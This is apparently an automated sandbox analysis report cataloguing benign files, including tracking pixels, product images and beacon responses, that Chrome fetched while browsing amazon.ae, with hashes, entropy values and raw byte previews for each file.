                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07yk48157_379x304_ae-en._SY116_CB623005781_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.1.."AQaq.2R...#......B..b....................................................!1..Aa.qB..............?...R.*..(..(..(.....n.....o/.,......o..@.R(.*R.N..H.m<...A.UkI?...t.9.P.iQ...V.0Ap........n...Fo...[h...K.T...a...=.....4..V.ir...D.....1........*.)JP)JP)JP)JP)JP)JP+..X-.S..........-...U..y...O8.!l..r3Q2.C}O.~m..#..3.>K.7....89.Z......v..+8..h9.....B.e.!...g......MZ..........l..,.J..F7.b.W;r..u3..........(."....#u#....NF}..^4......Z+KrWh...(P...:..w{.8|C.7..B...'..!..9..=.MH.WRC.].l...B..I.C...+aI?......%m...."j.0.M...]../..Y.....B...+}B...H.0.A........x..+.|.....Z.$.q.........)J .)@.)@.+..k....R.gu... .....h...3..,..#.|\..0[..<I.f.._.....n2..Z..\...o...=.gf..#A.U.p.Zm=_...d.N;...5...Jh4._J.....<....a.>A>.y#..."..B._
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):44
                                                                                                                                                                                                                                                                Entropy (8bit):4.6069367321753205
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Q3S1lnyum0KthkYN+n:QC1lnEB3+
                                                                                                                                                                                                                                                                MD5:FB7037B6C49077EE04BDDE5921F94A76
                                                                                                                                                                                                                                                                SHA1:8D53AE8B62A4BB881FB87FDB2DAA481536FB9522
                                                                                                                                                                                                                                                                SHA-256:B6F0ECEAE5F8C4A1B8C8564EAC734BBB9C5B1566DE23DC6D09C1212F16F76AE4
                                                                                                                                                                                                                                                                SHA-512:7904182F82C457A98F8E3799EBFD1F1E46A83EA5848727F200A89550393B4B4B1548AB7BF918C08DA69EA08CAF276D94C49B0F3D6E3EFFD1BD3D308B01C120A0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmsilr5PRTcwRIFDb1LTuESBQ1IOj9BEhAJoMhVlCI3m_YSBQ22hLHa?alt=proto
                                                                                                                                                                                                                                                                Preview:ChIKBw29S07hGgAKBw1IOj9BGgAKCQoHDbaEsdoaAA==
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?ld&v=0.294992.0&id=99EW8DTCPK04PDBCDQEK&ic=2&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=99EW8DTCPK04PDBCDQEK&ue=4&bb=211&ns=232&ne=312&be=627&fp=285&fcp=285&pc=2619&tc=-1195&na_=-1195&ul_=-1723469088077&_ul=-1723469088077&rd_=-1723469088077&_rd=-1723469088077&fe_=-1192&lk_=-1180&_lk=-1180&co_=-1180&_co=-452&sc_=-1179&rq_=-452&rs_=-180&_rs=186&dl_=-52&di_=711&de_=712&_de=719&_dc=2618&ld_=2618&_ld=-1723469088077&ntd=0&ty=0&rc=0&hob=4&hoe=5&ld=2620&t=1723469090697&ctb=1&rt=__ld:25-5-4-12-4-7-1&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-06|aui:css:cache|aui:js:cache|mutObsYes|ewc:unpersist|ewc:unpersist:emptycart|ewc:bview|ewc|ewc:unrec|ewc:cartsize:0|ewc:aui|navbar|fls-eu-amazon-ae|adblk_no|perfYes|fy_cdn_fr|fy_cdn_mp|FWCIMEnabled|mutObsActive|csm-feature-touch-enabled:false&viz=visible:4&pty=FreshMerchandisedContent&spty=learn-more&pti=learn-more&tid=99EW8DTCPK04PDBCDQEK&aftb=1&lob=1
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2182
                                                                                                                                                                                                                                                                Entropy (8bit):7.657280438908792
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r63fl3krwTXUUZjTpLirqSw4/cPDrOTeVOsYe59zJf2YUS:TnlewwO74UL2eVVYe59kYH
                                                                                                                                                                                                                                                                MD5:F43ECB0DCDEAC158481C81D15AAEB22E
                                                                                                                                                                                                                                                                SHA1:8DF04A2C32DEDBAF5B6F039B0ED7C27343407989
                                                                                                                                                                                                                                                                SHA-256:31A68D269462C8EC72AB9B6242267EBEBF9CF1F66579980F24620C8E2965CEE9
                                                                                                                                                                                                                                                                SHA-512:D7C7EF628D14DC2396D0A0AEB95C92FFBF331157B939AABEE378CC7A390FC98EEDA52482B334EFD1A2908891CA2F5157E4BD4F9D4C2865C719265040F5F7B626
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................1..!Aa"Qq..#2....BRS....34Cbr.................................................!Q.A............?..8..8...................................................................W..e.c.y.v%tT..Kw.#...T0.@.w.rk.....>..Y...........m.5...u..[n....Mn.....Wv[.8...<..h...s.....#=...8}..2..GkN..VN6)..Zu..H.......>....t..Q.t,{..g...>..7.)0._].r....E..gx....v.7i.,K%.U=..w.=G&.a.S..+. ..N..i.G.bz...~...(.}.vo..a.5...<.H....Zx....Kr.F...o....Z...AeD:...:..0$J.N)u}.:........G..#.k:`..7...[....Kn..'.@).$.Z..g.B..O.p...~R...../..o...6.......#W.o....}W$[.w.....9...9.e. ...g.h6...k./...J.A..W_i.W..E.v..NL....H..." ""." ""." D.........g.7..p...%....f=$Z.6..lD...F.k@.....Rwv.=.-K.`y"2 .Y......^L.........^m\......".......a-.wJ...f.!.E..|....q...4..-l..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:P3EBDX30THKD0V702NQB$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DP3EBDX30THKD0V702NQB%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D90%26pc0%3D1103%26ld0%3D1103%26t0%3D1723469079009%26sc1%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb1%3D1103%26pc1%3D5103%26ld1%3D5103%26t1%3D1723469083009%26sc2%3Dportal-bb%26pc2%3D1%26ld2%3D1%26t2%3D1723469080002%26sc3%3DcsmCELLSframework%26bb3%3D2524%26pc3%3D2524%26ld3%3D2524%26t3%3D1723469080430%26sc4%3DcsmCELLSpdm%26bb4%3D2524%26pc4%3D2524%26ld4%3D2524%26t4%3D1723469080430%26sc5%3DcsmCELLSvpm%26bb5%3D2524%26pc5%3D2524%26ld5%3D2524%26t5%3D1723469080430%26sc6%3DcsmCELLSfem%26bb6%3D2524%26pc6%3D2524%26ld6%3D2524%26t6%3D1723469080430%26sc7%3Due_sushi_v1%26bb7%3D2525%26pc7%3D2525%26ld7%3D2525%26t7%3D1723469080431%26sc8%3DInContextAuth%3AEligibility%3APreAuthCallLatency%26bb8%3D3760%26cf8%3D5064%26pc8%3D5064%26ld8%3D5064%26t8%3D1723469082970%26sc9%3Dp13n-rvi_desktop-rvi_0%26bb9%3D4987%26be9%3D4987%26pc9%3D5053%26ld9%3D5053%26t9%3D1723469082959%26sc10%3DSocialShareFramework.Latency.%26bb10%3D5062%26be10%3D5063%26pc10%3D5063%26ld10%3D5063%26t10%3D1723469082969%26ctb%3D1:7575
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 157x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5440
                                                                                                                                                                                                                                                                Entropy (8bit):7.916967881856454
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TU6e89++IHS5uB28FNbKBQtRVFMJD5vVpClFdefwtCXn7IDGOQyOlfwn5And/:oteubFpNtdgngl3MnnkDGSOlfC+d/
                                                                                                                                                                                                                                                                MD5:0050B37A94B449BD6FC35AE5365C8DA8
                                                                                                                                                                                                                                                                SHA1:E4FA217738300FDBBE325942C9F04267A614935F
                                                                                                                                                                                                                                                                SHA-256:9B3BC57BB9CDF2375119DD2624E0B856ADCE2DE4EBD3257C1679569A0A47B28B
                                                                                                                                                                                                                                                                SHA-512:EBABC2199D2C705CE169D7124A0EFD74E4296C85F3D45583908BECE58057AA33E524F6E298C37AC17AC93479FF96FB30987EE92A59E9102E5A70F4AE097F3B8A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1A..Qaq.....#2Rr...$Bb...34CDc.................................................1.!Aq.............?..t.(..(..(..(:~..v.;V21......4w...)S..........{...d.............Z.;JR.JR.JR.JR.JR.JR.JR.JR._5I.6.....xE}._Q.Ua..x.~.A..c........f.....c..8.......F28...<.W...P..DV6...LT.F..f*y..dRF.!0.......;../........TV<`...rI8.@.5A.Z>..?!..4...6a!.*...]..JR.JR.JR.JR.JR.JR.JR.Z..rn.(....$.'&....;u.k.d.W...........N2(>..5.P.v....t.08w..F...F...?z.:..}:.k(...K.h...L.4{f..2v..|.....f.5k.X./..m...........rX..W...^.i.u.l.j..;P.{...".$3...(.r.S.<.0o=....$V...v....G....5%$.E;..x`.8`.m..t...z...PF....~.%cu......rY..{:...*Q...(..(..(..(..(..(..(.....O;a.rm......sa.".].q....Z...n`...gB.....wb|.|@.......M...j..EI$...P.........`...,.i...-u..I..r..$)hekk...PC
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2434
                                                                                                                                                                                                                                                                Entropy (8bit):7.768630169468609
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rmIiIPsmv96C9wNh9muxEls7EMXnD8ZWOZgAVc+dl8YWD:TEBH94hNPXnDPO+Sd2D
                                                                                                                                                                                                                                                                MD5:AC38AC9C5B7F02246556EB35ABE3F474
                                                                                                                                                                                                                                                                SHA1:E0BC3CCED1251DC6136A32981082703F4C49469A
                                                                                                                                                                                                                                                                SHA-256:E92A98E10649D97FEC41AD6B55AB3FE31DC6D90A27F4FCBFBE9EDA3A61EBCE9C
                                                                                                                                                                                                                                                                SHA-512:F60C73BD4E543D0DBC468927C3DA374295B3EA2D28811E63F0A972598EFDF4286BE7CA56F1CB7D4CFBA309A502978AA6381907DFD5BC2BECD3DFABB6FBF46BDF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.12AQq.."Ba.......4r...#$3STbs.....6CRu................................................1...Q2AB............?...DU........Q..1E..2..(^F..{#...Q..t..I.."..p.t...E.q.....!...>-..S..a?z....Sg.:.i......=.HaY.......G$..BI.cm.xc.p).I.N.2&....D@DD.D@DD....?..I.-..P)3......_..h.YNuEw.....tLx..Z..qW..,p<......X.uI..uC.j....Y]...g.)..o..n.qx(..|.`..)nI-...v..>........p.FVP...'x{.#Z.b..$......f'[.:D.i/.I.m......R:K2=.....r..w...[....a...x. ..g.k.D.Q.....9..x.4M.f....UG:V..UA$.!.....@......r:...r..$.yn.....7..j.L....t4..w.$JC..._.....5...9.g.".......I.y..W/..a.h].._.OVW..9:....S..2.[.2>...q{.!....!......[...l..=.f.a....u4...._..\.Z#.M...O.Y.+...(.."" ""." ""...]..6...q.~.ox..X.c..T0S.f.....V...=.~.4..K#.}.fy.=.<6...o`.f....5..m]Y?S..?...x.A.....L}5.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):178844
                                                                                                                                                                                                                                                                Entropy (8bit):7.713853466443925
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:qPrZ/w+PmX+GZy8byYor5MEcz90dqdE1J2b8VCQQ98gYxzBaUfxe:QrMz1byY0M7z90dmETtgFqjRfxe
                                                                                                                                                                                                                                                                MD5:6A1276978399E431D44DF9D89D3A8020
                                                                                                                                                                                                                                                                SHA1:974B3FF2CB4650C6035A5A6E2EAD13610C6E4AD1
                                                                                                                                                                                                                                                                SHA-256:E38533851B852AA353E514439FB5CBAB2A80751BF5C4606464066E4929D0CB9D
                                                                                                                                                                                                                                                                SHA-512:190C810A5406C03142BB6289BFD172B7C0496D28100851FC0F3F39966FC83E42BC8DE29A151DBEF005116FFD8A14C252837C9A274CF983C77E06140BB0020652
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................8.......................................................................4..................................................................`........................`..(L...........@L.....2..Be...@..&P.....d.c.2y..5..5 ...............H.' ).'*@.' ?Y ....@................................................................0.......................0.0...P...........2..`.0.@...e..&P.`.....&........E ............NT... '*@........$....H................................................................&........................&.....(L...(L.&...L.........(.............1..0.!............... ..r.'*@...).9~.F... .................................................................`...........&......P..........(.0.(.0......L...L............qY.F9....V....H..........' . ' ).............H................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26m%3D1%26sc%3Dcsa%3Asi%26si%3D915%26pc%3D5709%26at%3D5709%26t%3D1723469093786%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:5708
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12571
                                                                                                                                                                                                                                                                Entropy (8bit):7.918578056569039
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YQxx2We9K0yhkAnzHpWbO2JRKLQSW0jJqSau4ehf02tTC/C7zx6uX5ztCe8GBS:LPYK0u7dJQJ0Lau4eh82tAAxBzoGBS
                                                                                                                                                                                                                                                                MD5:3AC30A09C64477A1A143D9455417C38E
                                                                                                                                                                                                                                                                SHA1:F53FBAC6BDC74E2B7E305A97719B27E64CCB5AA0
                                                                                                                                                                                                                                                                SHA-256:45C9BD5EFB1C71BAA1F55B6E32EBF3A39CD989E16C01C6EDA0D3D7DDF125D229
                                                                                                                                                                                                                                                                SHA-512:E035510CB2E1CDDBA293F537A48751039B74E0BD03B0290DD495420D58FB6A584A2632B59AA2682C691FEA9C899AE21E251A24709A787C5B4C0677E93E590D37
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........2............................................................................:..L..S.1h...c7.............5.|.m.jq.oW..p....gkQ5......l..l.O ........W..uZ~r............k.z...+.5a.P............F..E...........I.M...zx.....?T>~.a0.#N.{.<z.n.q1..M1..d.a....kbcc...S....6..o3k.<5..hH.$..s}.O...._[.i.:...]cW.__.:{9..N..>....;8x..A..:-jOE.z.....<..g..Q?g.._.2...}g....$.W.o...E.nh....U.T{g....a....T.|.g......Ml.@...x..7&;.\7..........!.1..l.n...[........t6s.....~.#.P..S.S{g.....o.....x.{IN.^.'+..T....Vw.".0.<B=..[.>.v........g.....O #.-.2t..H.......42....._d.....<.....P'......k.....Gu........wX+p..=.7o..k..z..;..`..OqQ....9.....I..%...*.Y..[.4..2..>..e...........X+p......N.z<...=).........>y......B...00...0......"5...}r..............U.S....H...UkU..;..y.~3._0.`a..>F..X.s.E.2.>..\...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/01/msa/vowels/metrics._STID6121-1723469099742_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?ld&v=0.294992.0&id=M6RE43WFQNSF80R5MH23&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=M6RE43WFQNSF80R5MH23&ue=4&bb=77&ns=148&ne=229&be=336&fp=195&fcp=195&pc=1057&tc=-1036&na_=-1036&ul_=-1723469063936&_ul=-1723469063936&rd_=-1723469063936&_rd=-1723469063936&fe_=-1034&lk_=-1008&_lk=-1008&co_=-1008&_co=-277&sc_=-1007&rq_=-277&rs_=-36&_rs=320&dl_=-30&di_=368&de_=369&_de=375&_dc=1056&ld_=1056&_ld=-1723469063936&ntd=0&ty=0&rc=0&hob=3&hoe=4&ld=1057&t=1723469064993&ctb=1&rt=__ld:11-4-2-3-3-7-1&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-06|mutObsYes|aui:css:cache|aui:js:cache|mutObsActive|ewc:unpersist|ewc:unpersist:emptycart|ewc:bview|ewc|ewc:unrec|ewc:cartsize:0|ewc:aui|navbar|FWCIMEnabled|fls-eu-amazon-ae|adblk_no|perfYes|csm-feature-touch-enabled:false&viz=visible:4&pty=i18n-preferences-web&spty=subSelectPreferences&pti=undefined&tid=M6RE43WFQNSF80R5MH23&aftb=1&lob=1
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 157x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11299
                                                                                                                                                                                                                                                                Entropy (8bit):7.966535173850626
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:CBx5odYydOYMNSI1ovY7LZMXKJnTX8239VHXNeSYFYepCa1uA9sXhnxtsot:C6mNSNW2XIs2NpdtYFYep9sRnxXt
